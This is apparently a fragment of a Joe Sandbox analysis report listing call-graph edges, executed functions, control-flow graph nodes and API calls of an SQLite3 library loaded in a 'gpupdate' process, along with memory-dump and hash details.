sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 27721->27823 27722->27714 27723->27706 27727 61e4b2f3 27724->27727 27734 61e4b32d sqlite3_free sqlite3_free 27724->27734 27725 61e4bb38 sqlite3_mutex_leave 27725->27706 27738 61e4b358 sqlite3_mutex_enter 27727->27738 27757 61e4b560 27728->27757 27729 61e4bbd6 sqlite3_uri_boolean 27735 61e4bc05 sqlite3_uri_boolean 27729->27735 27736 61e4bbff 27729->27736 27731 61e4be0a sqlite3_mutex_enter sqlite3_mutex_leave 27739 61e4bdc2 27731->27739 27732->27721 27732->27729 27732->27736 27732->27739 27733->27704 27733->27713 27734->27706 27735->27736 27736->27716 27737 61e4b85b sqlite3_free 27737->27741 27815 61e01713 27738->27815 27739->27713 27739->27731 27741->27713 27747 61e014e3 17 API calls 27741->27747 27752 61e4b8c7 27741->27752 27743 61e4b37f 27744 61e4b455 sqlite3_mutex_leave sqlite3_free 27743->27744 27745 61e4b392 strcmp 27743->27745 27750 61e4b3c2 27743->27750 27744->27746 27761 61e4b9e8 27744->27761 27745->27743 27746->27710 27747->27752 27748 61e17a8a 3 API calls 27748->27755 27749 61e4b433 27749->27744 27750->27749 27751 61e4b3f7 sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free sqlite3_free 27750->27751 27751->27706 27752->27713 27752->27739 27804 61e18666 27752->27804 27753 61e4b649 27818 61e0a13a 27753->27818 27755->27706 27755->27725 27757->27713 27757->27733 27757->27753 27817 61e20841 sqlite3_log 27757->27817 27758 61e4b9ad 27758->27713 27758->27739 27758->27761 27760 61e4b637 27760->27733 27760->27753 27761->27748 27762->27650 27763->27650 27764->27656 27766 61e0afb3 27765->27766 27768 61e0af6e 27766->27768 27855 61e0a41d sqlite3_free 27766->27855 27768->27645 27770 61e17a93 27769->27770 27771 61e17aa2 27769->27771 27770->27771 27772 61e17a17 sqlite3_mutex_try 27770->27772 27771->27662 27773 61e17a33 27772->27773 27775 61e17a41 27772->27775 27773->27662 27774 61e17a67 sqlite3_mutex_enter 27776 61e17a5a 27774->27776 27775->27774 27856 61e028db sqlite3_mutex_leave 27775->27856 27776->27773 27776->27774 27778->27664 27779->27665 27780->27668 27781->27682 27782->27679 27784 61e11c3d 27783->27784 27785 61e11d40 27783->27785 27784->27785 27786 61e11c58 sqlite3_mutex_enter 27784->27786 27785->27633 27788 61e11c6e 27786->27788 27787 61e11cc7 27791 61e11d05 27787->27791 27793 61e209b5 malloc 27787->27793 27788->27787 27796 61e09fd1 sqlite3_mutex_leave sqlite3_mutex_enter 27788->27796 27790 61e11d2f sqlite3_mutex_leave 27790->27785 27791->27790 27794 61e209db sqlite3_log 27793->27794 27795 61e209ce 27793->27795 27794->27795 27795->27791 27796->27787 27798 61e16b22 27797->27798 27799 61e16aff 27797->27799 27798->27692 27803 61e16a6a 11 API calls 27799->27803 27801 61e16b12 27801->27692 27802->27698 27803->27801 27807 61e1867d 27804->27807 27805 61e18733 27805->27758 27807->27805 27808 61e186e1 27807->27808 27828 61e182ef 27807->27828 27840 61e0b25b sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 27808->27840 27809 61e186db 27809->27808 27811 61e18726 27809->27811 27812 61e0b1d2 15 API calls 27809->27812 27839 61e0b25b sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 27811->27839 27814 61e18778 27812->27814 27814->27808 27814->27811 27816 61e0171c sqlite3_mutex_enter 27815->27816 27816->27743 27817->27760 27819 61e0a144 27818->27819 27821 61e0a0df 27818->27821 27819->27741 27820 61e0a130 sqlite3_free 27822 61e0a044 27820->27822 27821->27820 27821->27822 27822->27741 27823->27737 27841 61e171ad 27824->27841 27825 61e0b1fa 27825->27721 27827->27722 27829 61e18302 27828->27829 27830 61e18315 sqlite3_mutex_enter 27828->27830 27831 61e11c21 6 API calls 27829->27831 27832 61e1836c sqlite3_mutex_leave 27830->27832 27833 61e1832c 27830->27833 27834 61e1830a 27831->27834 27832->27829 27835 61e18310 27832->27835 27833->27832 27834->27835 27836 61e18387 sqlite3_mutex_enter 27834->27836 27835->27809 27837 61e1839e 27836->27837 27838 61e183b0 sqlite3_mutex_leave 27837->27838 27838->27835 27839->27805 27840->27805 27842 61e16cd5 6 API calls 27841->27842 27843 61e171c9 27842->27843 27844 61e1726a 27843->27844 27848 61e17114 27843->27848 27844->27825 27849 61e1713a 27848->27849 27850 61e16cd5 6 API calls 27849->27850 27853 61e1714c 27850->27853 27851 61e171a5 27851->27844 27854 61e0b490 8 API calls 27851->27854 27852 61e17194 sqlite3_free 27852->27851 27853->27851 27853->27852 27855->27768 27856->27775 27857 61e2f5f5 27858 61e2f5fe 27857->27858 27860 61e2f606 27857->27860 27859 61e2f946 27860->27859 27861 61e2f628 sqlite3_mutex_enter 27860->27861 27862 61e2f64a 27861->27862 27868 61e2f667 27861->27868 27864 61e2f653 sqlite3_config 27862->27864 27862->27868 27863 61e2f714 sqlite3_mutex_leave sqlite3_mutex_enter 27865 61e2f8e7 sqlite3_mutex_leave sqlite3_mutex_enter 27863->27865 27871 61e2f73f 27863->27871 27864->27868 27866 61e2f925 sqlite3_mutex_leave 27865->27866 27867 61e2f90e sqlite3_mutex_free 27865->27867 27866->27859 27867->27866 27868->27863 27869 61e2f6cc sqlite3_mutex_leave 27868->27869 27869->27859 27871->27865 27872 61e2f7ab sqlite3_malloc 27871->27872 27874 61e2f7d8 sqlite3_config 27871->27874 27875 61e2f7ec 27871->27875 27873 61e2f806 sqlite3_free sqlite3_os_init 27872->27873 27876 61e2f7ca 27872->27876 27873->27876 27874->27875 27875->27872 27875->27876 27876->27865 27877 61e2fa4b GetSystemInfo sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register 27878 61e2fac6 27877->27878 27879 61e834a2 sqlite3_mutex_enter 27880 61e834fe 27879->27880 27881 61e0a13a sqlite3_free 27880->27881 27888 61e835e1 27880->27888 27884 61e83547 27881->27884 27882 61e836d9 27883 61e0a13a sqlite3_free 27882->27883 27885 61e836e6 27883->27885 27903 61e17aa4 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 27884->27903 27936 61e28077 16 API calls 27885->27936 27888->27882 27888->27885 27935 61e4d5ab 98 API calls 27888->27935 27889 61e83558 27904 61e685f1 27889->27904 27891 61e839a8 27893 61e0a13a sqlite3_free 27891->27893 27894 61e839b5 27893->27894 27937 61e18cc0 sqlite3_free sqlite3_free 27894->27937 27896 61e835ae 27896->27888 27899 61e0a13a sqlite3_free 27896->27899 27898 61e839c0 27938 61e0f2d5 sqlite3_free 27898->27938 27899->27888 27902 61e839cd sqlite3_mutex_leave 27903->27889 27905 61e68621 27904->27905 27909 61e6860a 27904->27909 27939 61e6812b 27905->27939 27907 61e68812 27951 61e23392 sqlite3_free sqlite3_str_reset sqlite3_str_vappendf 27907->27951 27908 61e687ec 27950 61e23392 sqlite3_free sqlite3_str_reset sqlite3_str_vappendf 27908->27950 27912 61e6864d sqlite3_strnicmp 27909->27912 27913 61e6862a 27909->27913 27918 61e686a7 27909->27918 27933 61e68717 27909->27933 27914 61e68670 27912->27914 27912->27933 27913->27888 27913->27896 27934 61e23392 sqlite3_free sqlite3_str_reset sqlite3_str_vappendf 27913->27934 27943 61e03f9a sqlite3_stricmp 27914->27943 27916 61e6867b 27916->27933 27944 61e19d7e 11 API calls 27916->27944 27918->27913 27919 61e6871c 27918->27919 27920 61e6870d 27918->27920 27918->27933 27945 61e2354f 12 API calls 27919->27945 27921 61e0a13a sqlite3_free 27920->27921 27921->27933 27923 61e6874c 27946 61e2354f 12 API calls 27923->27946 27925 61e68757 27947 61e2354f 12 API calls 27925->27947 27927 61e6876c 27948 61e27b4d 11 API calls 27927->27948 27929 61e68788 27929->27913 27949 61e23392 sqlite3_free sqlite3_str_reset sqlite3_str_vappendf 27929->27949 27931 61e687a7 27932 61e0a13a sqlite3_free 27931->27932 27932->27933 27933->27907 27933->27908 27933->27913 27934->27896 27935->27882 27936->27891 27937->27898 27938->27902 27940 61e6813f 27939->27940 27941 61e6813b 27939->27941 27952 61e68098 27940->27952 27941->27909 27943->27916 27944->27918 27945->27923 27946->27925 27947->27927 27948->27929 27949->27931 27950->27913 27951->27913 27953 61e680c1 27952->27953 27954 61e680ce 27952->27954 27956 61e67d60 92 API calls 27953->27956 27957 61e680e5 27953->27957 27958 61e67d60 27954->27958 27956->27953 27957->27941 27989 61e778fa 27958->27989 27961 61e67e20 27961->27953 27962 61e17a8a 3 API calls 27964 61e67e32 27962->27964 27965 61e67e71 27964->27965 28002 61e44098 27964->28002 27973 61e67e94 27965->27973 28017 61e17d8b 27965->28017 27968 61e67e4b 27968->27965 27969 61e67e58 27968->27969 28023 61e15fcb sqlite3_free 27969->28023 27971 61e67f16 27974 61e67f35 27971->27974 27981 61e67f5a 27971->27981 27972 61e67e69 27972->27961 28030 61e19c9a sqlite3_free sqlite3_free sqlite3_free sqlite3_free 27972->28030 27975 61e67ed3 27973->27975 28024 61e16b2a 11 API calls 27973->28024 28026 61e15fcb sqlite3_free 27974->28026 27975->27971 27975->27974 28025 61e18176 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 27975->28025 27979 61e67f44 27979->27961 27979->27972 28029 61e49f72 74 API calls 27979->28029 28020 61e27a8a 27981->28020 27984 61e0a13a sqlite3_free 27985 61e67fea 27984->27985 27986 61e67ff8 27985->27986 28027 61e67c86 sqlite3_free sqlite3_str_reset sqlite3_str_vappendf sqlite3_exec 27985->28027 27986->27979 28028 61e19cf3 7 API calls 27986->28028 27990 61e77935 27989->27990 27991 61e77921 27989->27991 27993 61e67df6 27990->27993 27994 61e7794b sqlite3_strnicmp 27990->27994 27999 61e77943 27990->27999 28031 61e27aa0 sqlite3_str_reset sqlite3_log sqlite3_str_vappendf 27991->28031 27993->27961 27993->27962 27993->27972 27998 61e77976 27994->27998 27994->27999 27996 61e77a25 sqlite3_finalize 27996->27993 27997 61e779fe 27997->27996 27998->27996 27998->27997 28000 61e77a10 sqlite3_errmsg 27998->28000 27999->27993 28033 61e27aa0 sqlite3_str_reset sqlite3_log sqlite3_str_vappendf 27999->28033 28032 61e27aa0 sqlite3_str_reset sqlite3_log sqlite3_str_vappendf 28000->28032 28003 61e17a8a 3 API calls 28002->28003 28013 61e440ba 28003->28013 28004 61e445ac 28004->27968 28007 61e445b1 28007->28004 28055 61e16fee 9 API calls 28007->28055 28008 61e441dd memcmp 28008->28013 28009 61e4421f memcmp 28009->28013 28010 61e444c3 memcmp 28010->28013 28011 61e44290 memcmp 28011->28013 28013->28004 28013->28007 28013->28008 28013->28009 28013->28010 28013->28011 28016 61e18666 19 API calls 28013->28016 28034 61e43176 28013->28034 28052 61e9942f 8 API calls 28013->28052 28053 61e0b7e9 sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 28013->28053 28054 61e209ff sqlite3_log 28013->28054 28016->28013 28018 61e17a8a 3 API calls 28017->28018 28019 61e17da5 28018->28019 28061 61e23331 sqlite3_str_vappendf 28020->28061 28022 61e27a9e sqlite3_exec 28022->27984 28023->27972 28024->27975 28025->27971 28026->27979 28027->27986 28028->27979 28029->27972 28030->27961 28031->27993 28032->27996 28033->27993 28044 61e4318e 28034->28044 28046 61e434db 28034->28046 28035 61e4358d 28035->28013 28036 61e4340c 28036->28035 28060 61e1199f sqlite3_free sqlite3_free 28036->28060 28039 61e014e3 17 API calls 28040 61e43445 28039->28040 28040->28036 28041 61e43460 memcmp 28040->28041 28045 61e4347e 28041->28045 28042 61e433bf 28042->28036 28051 61e43299 28042->28051 28057 61e42568 43 API calls 28042->28057 28044->28036 28048 61e014e3 17 API calls 28044->28048 28049 61e431b4 28044->28049 28044->28051 28045->28046 28058 61e9942f 8 API calls 28045->28058 28046->28036 28059 61e313ab 35 API calls 28046->28059 28048->28049 28049->28036 28049->28042 28049->28051 28056 61e20841 sqlite3_log 28049->28056 28051->28036 28051->28039 28051->28045 28052->28013 28053->28013 28054->28013 28055->28004 28056->28042 28057->28051 28058->28046 28059->28046 28060->28035 28064 61e1430d 28061->28064 28063 61e2337a 28063->28022 28065 61e142be 28064->28065 28066 61e142df 28064->28066 28065->28066 28068 61e0a17b sqlite3_str_reset 28065->28068 28066->28063 28068->28066 28069 61e1249b 28070 61e12478 28069->28070 28071 61e124cb 28070->28071 28072 61e11c21 6 API calls 28070->28072 28073 61e12488 28072->28073 28074 61e679bd 28107 61e22b8e 28074->28107 28077 61e679de 28113 61e22948 sqlite3_log 28077->28113 28078 61e679ed sqlite3_mutex_enter 28080 61e0afda sqlite3_free 28078->28080 28091 61e67a0b 28080->28091 28081 61e679e8 28082 61e67a14 sqlite3_prepare_v2 28082->28091 28105 61e67b53 28082->28105 28083 61e67c16 28086 61e0a13a sqlite3_free 28083->28086 28085 61e67a69 sqlite3_step 28085->28091 28087 61e67c20 28086->28087 28117 61e0f2d5 sqlite3_free 28087->28117 28090 61e67c29 28094 61e67c35 sqlite3_errmsg 28090->28094 28102 61e67c60 28090->28102 28091->28082 28091->28085 28093 61e67b1d sqlite3_column_text 28091->28093 28096 61e0a13a sqlite3_free 28091->28096 28098 61e67b96 28091->28098 28099 61e67ae2 sqlite3_column_name 28091->28099 28091->28105 28106 61e778fa 6 API calls 28091->28106 28115 61e4d5ab 98 API calls 28091->28115 28092 61e67c71 sqlite3_mutex_leave 28092->28081 28093->28091 28095 61e67b3c sqlite3_column_type 28093->28095 28097 61e67c46 28094->28097 28095->28091 28095->28105 28096->28091 28097->28092 28100 61e0afda sqlite3_free 28097->28100 28114 61e4d5ab 98 API calls 28098->28114 28099->28091 28100->28102 28102->28092 28103 61e67ba3 28104 61e0afda sqlite3_free 28103->28104 28104->28105 28105->28083 28116 61e4d5ab 98 API calls 28105->28116 28106->28091 28108 61e22ba2 28107->28108 28112 61e22b98 28107->28112 28110 61e22bd9 28108->28110 28118 61e22b44 sqlite3_log 28108->28118 28109 61e22bc3 sqlite3_log 28109->28110 28110->28077 28110->28078 28112->28109 28112->28110 28113->28081 28114->28103 28115->28091 28116->28083 28117->28090 28118->28112

                                              Executed Functions

                                              Function 61E96DE5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 328COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 209 61e96de5-61e96e12 sqlite3_initialize 210 61e96e18-61e96e24 209->210 211 61e97314-61e9731b 209->211 212 61e96e3e-61e96e43 210->212 213 61e96e26-61e96e29 210->213 215 61e96e4c-61e96e53 212->215 216 61e96e45-61e96e4a 212->216 213->212 214 61e96e2b-61e96e35 213->214 214->212 217 61e96e37 214->217 219 61e96e5d-61e96e74 call 61e16cd5 215->219 220 61e96e55 215->220 218 61e96e5a 216->218 217->212 218->219 223 61e96e7a-61e96e7c 219->223 224 61e97310-61e97312 219->224 220->218 226 61e96e9c-61e97044 sqlite3_mutex_enter call 61e28834 * 5 223->226 227 61e96e7e-61e96e8d call 61e01713 223->227 225 61e972d3-61e972e0 sqlite3_errcode 224->225 229 61e972ee-61e972f0 225->229 230 61e972e2-61e972ec sqlite3_close 225->230 245 61e972c8-61e972ce sqlite3_mutex_leave 226->245 246 61e9704a-61e9705b 226->246 227->226 237 61e96e8f-61e96e97 sqlite3_free 227->237 233 61e972f9-61e9730e sqlite3_free_filename 229->233 235 61e972f2 229->235 230->233 233->211 235->233 237->224 245->225 247 61e97069-61e97083 call 61e3b989 246->247 248 61e9705d-61e97067 call 61e22948 246->248 251 61e97088-61e9708c 247->251 248->251 253 61e9708e-61e97091 251->253 254 61e970d0-61e970f2 call 61e4b183 251->254 255 61e9709a-61e970cb call 61e28077 sqlite3_free 253->255 256 61e97093-61e97095 call 61e0f22d 253->256 260 61e970f7-61e970f9 254->260 255->245 256->255 262 61e970fb-61e97111 call 61e0afda 260->262 263 61e97116-61e97135 call 61e17a8a call 61e1b51c 260->263 262->245 270 61e97148-61e97188 call 61e0b721 call 61e1b51c 263->270 271 61e97137-61e97143 call 61e16b2a 263->271 270->245 277 61e9718e-61e971b2 call 61e0afda sqlite3_overload_function 270->277 271->270 280 61e971bb-61e971c0 sqlite3_errcode 277->280 281 61e971b4-61e971b6 call 61e0f22d 277->281 283 61e971c5-61e971c7 280->283 281->280 284 61e971c9-61e971cc 283->284 285 61e971db-61e971dd 283->285 284->285 286 61e971ce-61e971d9 284->286 287 61e97298-61e9729c call 61e0afda 285->287 288 61e971e3-61e971e5 285->288 286->283 292 61e972a1-61e972c3 call 61e1214e sqlite3_wal_autocheckpoint 287->292 290 61e971ec 288->290 293 61e971ee-61e971f8 sqlite3_errcode 290->293 294 61e97203-61e97221 call 61e01713 sqlite3_mutex_enter 290->294 292->245 293->245 296 61e971fe 293->296 300 61e97233-61e97235 294->300 301 61e97223-61e97231 294->301 296->292 302 61e97237-61e9724e sqlite3_mutex_leave 300->302 301->302 303 61e97250-61e97266 302->303 304 61e97285-61e97293 sqlite3_free 302->304 303->304 306 61e97268-61e97280 call 61e28077 303->306 304->290 306->304
                                              APIs
                                              • sqlite3_initialize.SQLITE3 ref: 61E96E0B
                                              • sqlite3_free.SQLITE3 ref: 61E96E92
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E96EA7
                                              • sqlite3_free.SQLITE3 ref: 61E970C6
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E972CE
                                                • Part of subcall function 61E4B183: strcmp.MSVCRT ref: 61E4B1BF
                                                • Part of subcall function 61E4B183: sqlite3_free.SQLITE3 ref: 61E4B2DB
                                              • sqlite3_overload_function.SQLITE3 ref: 61E971AA
                                              • sqlite3_errcode.SQLITE3 ref: 61E971C0
                                              • sqlite3_errcode.SQLITE3 ref: 61E971F1
                                              • sqlite3_wal_autocheckpoint.SQLITE3 ref: 61E972C3
                                              • sqlite3_errcode.SQLITE3 ref: 61E972D6
                                              • sqlite3_close.SQLITE3 ref: 61E972E7
                                              • sqlite3_free_filename.SQLITE3 ref: 61E97304
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_errcodesqlite3_free$sqlite3_closesqlite3_free_filenamesqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_overload_functionsqlite3_wal_autocheckpointstrcmp
                                              • String ID: BINARY$NOCASE$RTRIM$main
                                              • API String ID: 1008213077-3184650557
                                              • Opcode ID: bd8bd43738f82cb84b2fb788e3b85c1507f6f2e4c2063affa260a8742f847dfd
                                              • Instruction ID: 9e6369dc5988a59e46b1eb31ea5f0242412086afb0af32124021ade0201fabb8
                                              • Opcode Fuzzy Hash: bd8bd43738f82cb84b2fb788e3b85c1507f6f2e4c2063affa260a8742f847dfd
                                              • Instruction Fuzzy Hash: 51E127B0A087868BEB00DF69C49075ABBE1BF89308F24C86DE8899F345D779D845CF51
                                              Function 61E2FA4B Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSystemInfo.KERNEL32(?,?,61EB2400,?,61E2F813), ref: 61E2FA65
                                              • sqlite3_vfs_register.SQLITE3 ref: 61E2FA7B
                                                • Part of subcall function 61E2F9E8: sqlite3_initialize.SQLITE3(?,?,61E2FA80), ref: 61E2F9F3
                                                • Part of subcall function 61E2F9E8: sqlite3_mutex_enter.SQLITE3(?,?,61E2FA80), ref: 61E2FA0B
                                                • Part of subcall function 61E2F9E8: sqlite3_mutex_leave.SQLITE3 ref: 61E2FA3D
                                              • sqlite3_vfs_register.SQLITE3 ref: 61E2FA8F
                                              • sqlite3_vfs_register.SQLITE3 ref: 61E2FAA3
                                              • sqlite3_vfs_register.SQLITE3 ref: 61E2FAB7
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 3532963230-0
                                              • Opcode ID: 81fa268347d78dc440d10cc994ccb8d533ce22c017d29db1843cda0388c1b84d
                                              • Instruction ID: df3ae48125a3f45e527273af0f8407171bfa7597338f8eba8dea01d60a236471
                                              • Opcode Fuzzy Hash: 81fa268347d78dc440d10cc994ccb8d533ce22c017d29db1843cda0388c1b84d
                                              • Instruction Fuzzy Hash: 0BF0F9B0208601FBD700AFE5C52671EBAE5BF82708F65CC1DD1849B380DB79D8448B53
                                              Function 61E4B183 Relevance: 41.0, APIs: 21, Strings: 2, Instructions: 770stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                              • String ID: @$rnal
                                              • API String ID: 42632313-826727331
                                              • Opcode ID: 5a1f225263ae08c783d1e7f64e6066be7cd4deaa71e28af57a43fbd85d82257f
                                              • Instruction ID: 4e7b36b1bd1a2b59d60cdd41a8104fbcb312ce53c55661181d1af75be3aee4e2
                                              • Opcode Fuzzy Hash: 5a1f225263ae08c783d1e7f64e6066be7cd4deaa71e28af57a43fbd85d82257f
                                              • Instruction Fuzzy Hash: 2C82D370A04259CFEB20CF68D884B89BBF1BF49308F25C5A9D858AB352D774DA85CF51
                                              Function 61E2F5F5 Relevance: 19.7, APIs: 13, Instructions: 203COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 308 61e2f5f5-61e2f5fc 309 61e2f606-61e2f618 call 61e08c77 308->309 310 61e2f5fe-61e2f605 308->310 313 61e2f946-61e2f94d 309->313 314 61e2f61e-61e2f644 call 61e01713 sqlite3_mutex_enter 309->314 317 61e2f6e1-61e2f6f2 314->317 318 61e2f64a-61e2f651 314->318 319 61e2f714-61e2f739 sqlite3_mutex_leave sqlite3_mutex_enter 317->319 320 61e2f6f4-61e2f70a call 61e01713 317->320 321 61e2f653-61e2f662 sqlite3_config 318->321 322 61e2f667-61e2f68d call 61e01713 318->322 324 61e2f8e7-61e2f90c sqlite3_mutex_leave sqlite3_mutex_enter 319->324 325 61e2f73f-61e2f746 319->325 320->319 332 61e2f70c-61e2f70e 320->332 321->322 334 61e2f6a4-61e2f6ae 322->334 335 61e2f68f-61e2f699 322->335 329 61e2f925-61e2f932 sqlite3_mutex_leave 324->329 330 61e2f90e-61e2f91b sqlite3_mutex_free 324->330 325->324 328 61e2f74c-61e2f7a9 call 61e116fd * 4 325->328 349 61e2f7ab-61e2f7c8 sqlite3_malloc 328->349 350 61e2f7cf-61e2f7d6 328->350 329->313 330->329 332->319 336 61e2f934 332->336 339 61e2f6b8-61e2f6ca 334->339 335->334 338 61e2f69b-61e2f6a2 335->338 341 61e2f939-61e2f944 sqlite3_mutex_leave 336->341 338->334 338->339 339->317 344 61e2f6cc-61e2f6dc 339->344 341->313 344->341 351 61e2f806-61e2f817 sqlite3_free sqlite3_os_init 349->351 352 61e2f7ca 349->352 353 61e2f7d8-61e2f7e7 sqlite3_config 350->353 354 61e2f7ec-61e2f7fe 350->354 355 61e2f8dd 351->355 356 61e2f81d-61e2f824 351->356 352->355 353->354 354->355 360 61e2f804 354->360 355->324 358 61e2f82a-61e2f83d 356->358 359 61e2f8ce-61e2f8d3 356->359 361 61e2f846-61e2f848 358->361 362 61e2f83f-61e2f844 358->362 359->355 360->349 363 61e2f84a-61e2f869 361->363 362->363 364 61e2f873-61e2f89a 363->364 365 61e2f86b-61e2f870 363->365 366 61e2f89e-61e2f8a5 364->366 365->364 367 61e2f8b6-61e2f8c0 366->367 368 61e2f8a7-61e2f8b4 366->368 369 61e2f8c2 367->369 370 61e2f8c8 367->370 368->366 369->370 370->359
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_configsqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 3543594801-0
                                              • Opcode ID: 5a89d1918f457bfa512c6cc4fca444d06d8331e5190c9fd7282b9689f5b64ded
                                              • Instruction ID: 0fb8f7a59178ec8329be64c967bc68422d8ca0bc61a9c31a63b8ccb7d9fa6610
                                              • Opcode Fuzzy Hash: 5a89d1918f457bfa512c6cc4fca444d06d8331e5190c9fd7282b9689f5b64ded
                                              • Instruction Fuzzy Hash: B0818470614E828BEB189FB9C564359B6F1FB86309F24882EC555C7380EBB9D8C1CF51
                                              Function 61E679BD Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 212COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
